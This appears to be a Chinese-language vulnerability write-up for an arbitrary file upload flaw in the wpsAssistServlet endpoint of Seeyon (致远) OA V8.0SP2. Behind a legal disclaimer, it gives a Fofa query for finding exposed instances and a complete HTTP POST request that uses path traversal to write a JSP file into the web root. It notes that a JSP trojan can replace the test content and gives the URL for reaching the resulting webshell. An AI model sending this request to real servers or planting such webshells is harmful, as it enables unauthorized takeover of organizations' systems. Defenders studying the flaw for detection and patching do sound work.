致远OA wpsAssistServlet接口存在任意文件上传漏洞

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

致远OA互联新一代智慧型协同运营平台以中台的架构和技术、协同、业务、连接、数据的专 业能力，夯实协同运营中台的落地效果；以移动化、AI智能推进前台的应用创新，实现企业轻量化、智能化业务场景，促进企业全过程管理能效，赋予企业协同工作和运营管理的新体验；在协同运营平台全面升级的基础上，V8.0深耕大型企业管理模式、运营机制，进一步强化“协同”在管理中的价值，推动大中型企业、集团企业、国资以及高新技术企业的管理模式升级，帮助企业构筑全程、全域、全端的运营和服务能力，提升人员效率和组织绩效，赋能企业数字化、智能化发展。

漏洞影响

致远互联-OA V8.0SP2

漏洞危害

致远OA wpsAssistServlet接口存在任意文件上传漏洞，未经允许的攻击者可通过上传webshell接管服务器

网络测绘

Fofa: app=“致远互联-OA” && title=“V8.0SP2”

漏洞复现

1. 构造poc

POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/36011.jsp&fileId=2 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=DA7A3D091BXXXXXXXXXXXXXXXX4BA41B; loginPageURL=
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=a4d7586ac9d50625dee11e86fa69bc71
Content-Length: 215--a4d7586ac9d50625dee11e86fa69bc71
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel<% out.println("215882935");%>  
--a4d7586ac9d50625dee11e86fa69bc71--

2. 发送数据包

会在网站根目录生成一个36011.jsp的文件
上传的文件内容可替换为jsp木马

3. 访问webshell地址

http://127.0.0.1:8899/36011.jsp